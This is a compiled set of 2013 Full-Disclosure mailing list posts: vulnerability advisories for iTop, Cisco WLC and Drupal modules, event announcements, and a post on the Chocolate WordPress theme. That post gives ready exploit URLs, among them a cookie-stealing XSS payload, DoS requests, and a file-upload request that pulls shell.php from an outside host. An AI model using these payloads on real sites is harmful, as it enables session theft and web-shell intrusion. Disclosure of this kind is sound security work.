Re: [Full-disclosure] Rather interesting whois for yahoo.com?
This is normal 2013/1/22 Dan Dart dand...@googlemail.com https://gist.github.com/4596868 Regards Dan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LACSEC 2013: 8th Network Security Event for Latin America and the Caribbean (CFP)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *** CALL FOR PRESENTATIONS *** LACSEC 2013 8th Network Security Event for Latin America and the Caribbean May 5-10, 2013, Medellin, Colombia http://www.lacnic.net/en/web/eventos/lacnic19 LACNIC (http://www.lacnic.net) is the international organization based in (Uruguay) that is responsible for the administration of the IP address space, Reverse Resolution, Autonomous System Numbers and other resources for the Latin American and the Caribbean region on behalf of the Internet community. The 8th Network Security Event for Latin America and the Caribbean will be held in Medellin, Colombia, within the framework of LACNIC's eighteenth annual meeting (LACNIC XIX). This is a public call for presentations for that event. The topics of interest include, but are not limited to, the following: * Honeypots, network monitoring and situational awareness tools in general. * Fighting spam, particularly spam from origin (SPF, DKIM and related technologies. Email reputation) * Fighting phishing and pharming * Fighting malware * Internet protocol security * IPv6 security * DNSsec * Security of network infrastructure services (DNS, NTP, etc.) * Web security * DoS/DDoS response and mitigation, botnets * Authentication and access control * Security in the cloud * Critical infrastructure protection * Mobile systems security * Computer security incident response teams (CSIRTs): creation, management, experiences * Security in corporate environments, compliance and auditing, return on information security investments * Security management (procedures, operational logs, records, etc.) * Risk management in Information Security * Computer forensics * Protection of privacy * Legal aspects related to information security Guidelines for Presenting Proposals Proposals for the 8th Network Security Event for Latin America and the Caribbean (LACSEC 2013) must be presented taking into account the following considerations: * The proposal may consist of a paper, or (alternatively) an Extended Abstract plus a draft version of the slides to be used during the presentation. * Proposals may be presented in English, Portuguese or Spanish. * Proposals must be submitted in Portable Document Format (PDF) * Submissions must be created directly using a word processing system (scanned articles will not be accepted) * Presentations may not be longer than 30 minutes. Submitting a Proposal Those interested in presenting at LACSEC 2013 must send the following information to comite_seguri...@lacnic.net within the deadlines set forth below: * Full title of the presentation * A paper or, alternatively, an Extended Abstract and a draft of the slides to be used during the presentation. The paper should not be longer than 10 pages. The extended abstract should not contain more than one thousand (1000) words. The Evaluation Committee may, at its sole discretion, request additional or complementary information. * Full name, email address and organization with which the author (or authors) of the submission is affiliated For more information, please do not hesitate to contact the Evaluation Committee at comite_seguri...@lacnic.net. Proposal Evaluation The Evaluation Committee created for this purpose will evaluate proposals based on the following basic criteria: * Originality * Technical quality * Relevance * Presentation * Applicability Speaker's Privileges LACNIC will cover the registration fee for those authors whose presentations are accepted. However, speaker travel and accommodation expenses will not be covered. Presenters who require financial assistance to attend the event may apply for the LACNIC Financial Assistance Program. Please read the corresponding instructions http://www.lacnic.net/en/web/eventos/lacnic19. In no case does applying for the sponsorship program guarantee that financial assistance will be granted. For more information please contact LACNIC staff at be...@lacnic.net. IMPORTANT DATES * Deadline for proposal submission: March 1st, 2013 * Notification of acceptance: March 11st, 2013 * Deadline for submitting the final version the presentation: May 5th, 2012 8th Network Security Event for Latin America and the Caribbean (LACSEC 2013) Chair Fernando Gont (SI6 Networks/UTN-FRH, Argentina) Evaluation Committee Iván Arce (Fundación Sadosky, Argentina) Carlos A. Ayala Rocha (Arbor Networks, Mexico) Julio César Balderrama (ISM GLOBAL S.A., Argentina) Matthias Bethke (Zonarix S.A., Ecuador) Eduardo Carozo Blumsztein (ITC SA, Uruguay) Jeimy J. Cano M. (Fac. de Derecho, U. de los Andes, Colombia) Giovanni Cruz Forero (Consultor Independiente, Colombia) Lorena Ferreyro (Consultora Independiente, Argentina) Javier Liendo (Cisco Mexico, Cisco)
[Full-disclosure] DC4420 - London DEFCON - January 2013 meet. Tuesday 29th January 2013
what it says on the tin! speakers: Chris Sumner (Suggy) - Online Privacy Foundation presenting: Predicting Dark Triad Personality Traits from Twitter usage and a linguistic analysis of Tweets This study explores the extent to which it is possible to determine anti-social personality traits based on Twitter use. This was performed by comparing the Dark Triad and Big Five personality traits of 2,927 Twitter users with their profile attributes and use of language. Analysis shows that there are some statistically significant relationships between these variables. Through the use of crowd sourced machine learning algorithms, we show that machine learning provides useful prediction rates, but is imperfect in predicting an individual’s Dark Triad traits from Twitter activity. While predictive models may be unsuitable for predicting an individual’s personality, they may still be of practical importance when models are applied to large groups of people, such as gaining the ability to see whether anti-social traits are increasing or decreasing over a population. and... yours truly Adam Laurie (Major Malfunction) Zac Franken - Aperture Labs Ltd. presenting: Hardware Hacking The Easy Hard Way: Semi-Automating the process of decapping chips Fancy getting your hands disolved^W dirty with boiling nitric acid? Ever wondered what's under the silicon in a silicon chip? And once you're under the hood, what next? This short talk will reveal our initial explorations into the caustic world of silicon deconstruction. There will be toolz... Venue: Downstairs at The Phoenix: http://www.phoenixcavendishsquare.co.uk/ be there by 19:30.. More: http://dc4420.org see you next week! cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-0805
# # # COMPASS SECURITY ADVISORY http://www.csnc.ch/ # # # # CVE ID : CVE-2013-0805 # CSNC ID: CSNC-2013-001 # Product: iTop # Vendor: Combodo # Subject: Cross-site Scripting - XSS # Risk:High # Effect: Remotely exploitable # Author: Stephan Rickauer (stephan.rickauer _at_ csnc.ch) # Date:January 23rd 2013 # # Introduction: - Compass Security discovered a security flaw in the iTop web application. Vulnerable: --- All iTop versions older than: * trunk revision 2589 * branches/1.2.1, revision 2587 * branches/1.2, revision 2588 * branches/2.0, revision 2590 Not vulnerable: --- unknown Patches: Patches have been commited to the SourceForge Trac by the vendor with respect to all affected versions. Modified files: pages/UI.php and pages/run_query.php Fix: Thoroughly encode all user input properly on output. Description: The iTop search feature displays the term entered by the user. However, that very output of the user's input happens mostly un-encoded. The implemented mitigation step of only encoding as part of a script tag is inadequate and can be easily bypassed. Exploiting this vulnerability will lead to so-called cross-site scripting (XSS) and allows the impersonation of logged-in iTop users. Milestones: --- January 4th, Vulnerability discovered January 4th, Vendor contact established January 7th, Vendor provided with technical details January 7th, Vendor acknowledged issue (support _at_ combodo.com) January 15th, CVE assigned and vendor notified January 23rd, Patch committed in all main branches of the iTop project by vendor January 23rd, Public release of advisory References: --- XSS reference: http://en.wikipedia.org/wiki/Cross-site_scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued. iTop reference: http://www.combodo.com/iTop-a-new-generation-of-IT.html Provided evidence: - Two screenshots - XSS attack code - copy of html page showing unencoded output ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco Wireless LAN Controllers
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Multiple Vulnerabilities in Cisco Wireless LAN Controllers Advisory ID: cisco-sa-20130123-wlc Revision 1.0 For Public Release 2013 January 23 16:00 UTC (GMT) - -- Summary === The Cisco Wireless LAN Controller (Cisco WLC) product family is affected by the following four vulnerabilities: Cisco Wireless LAN Controllers Wireless Intrusion Prevention System (wIPS) Denial of Service Vulnerability Cisco Wireless LAN Controllers Session Initiation Protocol Denial of Service Vulnerability Cisco Wireless LAN Controllers HTTP Profiling Remote Code Execution Vulnerability Cisco Wireless LAN Controllers SNMP Unauthorized Access Vulnerability Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130123-wlc -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlD/9LgACgkQUddfH3/BbTqd2AEAjfwbSyTP5MOkZpmjQ/7ROsgt cxqqo3ApRtSkrqQ8QIYA/0U7bOtjGo6TyrU8P/XRmTYHUR4pnJzcAY15nULCBXzM =kd2V -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-006 - Video - Arbitrary Code Execution
View online: http://drupal.org/node/1896714 * Advisory ID: DRUPAL-SA-CONTRIB-2013-006 * Project: Video [1] (third-party module) * Version: 7.x * Date: 2013-January-23 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Arbitrary PHP code execution DESCRIPTION - The video module enables you to upload video and audio files and transcode them into other formats and sizes using other tools like FFmpeg or Zencoder. The module saves information about the FFmpeg executable in a temporary PHP file, but doesn't check if the file has been tampered with when reading the file, allowing any PHP code in that file to be executed. This vulnerability is mitigated by the fact that an attacker must have write access to the temporary PHP file (something which is not known to be possible via the module itself). Sites not using the FFmpeg transcoder are only vulnerable if the attacker has the 'administer site configuration' permission in order to change the transcoder to FFmpeg. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Video 7.x-2.x versions prior to 7.x-2.9. Drupal core is not affected. If you do not use the contributed Video [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Video module for Drupal 7.x, upgrade to Video 7.x-2.9 [5] Also see the Video [6] project page. REPORTED BY - * Joris van Eijden [7] of the Drupal Security Team FIXED BY * Jorrit Schippers [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/video [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/video [5] http://drupal.org/node/1895234 [6] http://drupal.org/project/video [7] http://drupal.org/user/892998 [8] http://drupal.org/user/161217 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-007 User Relationships - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1896720 * Advisory ID: DRUPAL-SA-CONTRIB-2013-007 * Project: User Relationships [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The User Relationships module allows you to create multiple relationship types and maintain relationships between users in your Drupal site. The module does not sufficiently escape relationship names before display. This allows users with the correct permissions to create relationship names containing arbitrary Javascript which will then be executed by the browser. This vulnerability is mitigated by the fact that an attacker must have a role with the permission administer user relationships. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * User Relationships 6.x-1.x versions prior to 6.x-1.4 * User Relationships 7.x-1.x versions prior to 7.x-1.0-alpha5 Drupal core is not affected. If you do not use the contributed User Relationships [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the User Relationships module for Drupal 6.x, upgrade to User Relationships 6.x-1.4 [5] * If you use the User Relationships module for Drupal 7.x, upgrade to User Relationships 7.x-1.0-alpha5 [6] Also see the User Relationships [7] project page. REPORTED BY - * Klaus Purer [8] of the Drupal Security Team FIXED BY * Mark Ferree [9] the module maintainer COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/user_relationships [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/user_relationships [5] http://drupal.org/node/1896272 [6] http://drupal.org/node/1896276 [7] http://drupal.org/project/user_relationships [8] http://drupal.org/user/262198 [9] http://drupal.org/user/76245 [10] http://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-008 - CurvyCorners - Cross Site Scripting (XSS) - module unsupported
View online: http://drupal.org/node/1896718 * Advisory ID: DRUPAL-SA-CONTRIB-2013-008 * Project: CurvyCorners [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The CurvyCorners module enables you to create rounded corners on HTML block elements. The module doesn't sufficiently filter user entered text when being displayed. This vulnerability is mitigated by the fact that an attacker must have a role with the permission administer curvycorners. CVE IDENTIFIER(S) ISSUED * CVE-2013-1393 VERSIONS AFFECTED --- * All CurvyCorners 6.x-1.x versions. * All CurvyCorners 7.x-1.x versions. Drupal core is not affected. If you do not use the contributed CurvyCorners [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the CurvyCorners module, uninstall the module - there is no patch available to fix this issue Also see the CurvyCorners [4] project page. REPORTED BY - * rickauer [5] FIXED BY Not applicable. COORDINATED BY -- * Greg Knaddison [6] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7]. Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10]. [1] http://drupal.org/project/curvycorners [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/curvycorners [4] http://drupal.org/project/curvycorners [5] http://drupal.org/user/69553 [6] http://drupal.org/user/36762 [7] http://drupal.org/contact [8] http://drupal.org/security-team [9] http://drupal.org/writing-secure-code [10] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-009 - Keyboard Shortcut Utility - Access Bypass - module unsupported
View online: http://drupal.org/node/1896752 * Advisory ID: DRUPAL-SA-CONTRIB-2013-009 * Project: Keyboard Shortcut Utility [1] (third-party module) * Version: 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Keyboard Shortcut Utility module enables you to create keyboard shortcuts on your website. You can create a shortcut to go to a page (internal or external) or call a JavaScript function. The module doesn't sufficiently check node access to view nodes for users who have view shortcuts permission. It also doesn't check node access to view, edit, or delete nodes for users who have the admin shortcuts permission. This vulnerability is mitigated by the fact that an attacker must have a role with the permission view shortcuts or admin shortcuts. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All Keyboard Shortcut Utility 7.x-1.x versions. Drupal core is not affected. If you do not use the contributed Keyboard Shortcut Utility [4] module, there is nothing you need to do. SOLUTION Uninstall the module. No patched version is available. Also see the Keyboard Shortcut Utility [5] project page. REPORTED BY - * Michael Griego [6] FIXED BY Not applicable. COORDINATED BY -- * Ivo Van Geertruyen [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/keyboard_shortcut [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/keyboard_shortcut [5] http://drupal.org/project/keyboard_shortcut [6] http://drupal.org/user/524484 [7] http://drupal.org/user/383424 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] sql query displaying on error
http://demo.demolink.biz/index.php?option=com_contentview=articleid=94Itemid=236
Table './demolink_ccdemo/are1s_session' is marked as crashed and should be
repaired SQL=INSERT INTO `are1s_session` (`session_id`, `client_id`,
`time`) VALUES ('526944509a863ca28cd0dd7763eb1e3e', 0, '1358966730')
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-010 - Search API sorts - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1896782 * Advisory ID: DRUPAL-SA-CONTRIB-2013-010 * Project: Search API sorts [1] (third-party module) * Version: 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables you to sort by Search API facets. The module doesn't sufficiently filter user entered text in field labels. This vulnerability is mitigated by the fact that an attacker must have a role with the ability to modify field labels such as administer taxonomy. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Search API Sorts 7.x-1.x versions prior to 7.x-1.4. Drupal core is not affected. If you do not use the contributed Search API sorts [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Search API Sorts module for Drupal 7.x, upgrade to Search API Sorts 7.x-1.4 [5] Also see the Search API sorts [6] project page. REPORTED BY - * Francisco José Cruz Romanos [7] FIXED BY * Francisco José Cruz Romanos [8] COORDINATED BY -- * Klaus Purer [9] of the Drupal Security Team * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/1097626 [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/1097626 [5] http://drupal.org/node/1896756 [6] http://drupal.org/project/1097626 [7] https://drupal.org/user/848238 [8] https://drupal.org/user/848238 [9] http://drupal.org/user/262198 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in Chocolate WP theme for WordPress
Hello list! I want to warn you about multiple vulnerabilities in Chocolate WP theme for WordPress. This is commercial theme for WP. These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. In 2011 I wrote about Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later also was disclosed Arbitrary File Uploading (WASC-31) vulnerability. In previous years I've wrote about multiple vulnerabilities in 145 WP themes (http://websecurity.com.ua/4915/) and here is another theme. - Affected products: - Vulnerable are all versions of Chocolate WP theme for WordPress. Earlier I've informed developers about these vulnerabilities. -- Details: -- XSS (WASC-08) (in older versions of TimThumb): http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.pngh=1w=111 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.pngh=111w=1 Abuse of Functionality (WASC-42): http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://siteh=1w=1 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.comh=1w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_fileh=1w=1 http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_fileh=1w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Arbitrary File Upload (WASC-31): http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php Full path disclosure (WASC-13): http://site/wp-content/themes/dt-chocolate/ Besides index.php there are also potentially FPD in other php-files of this theme. Best wishes regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
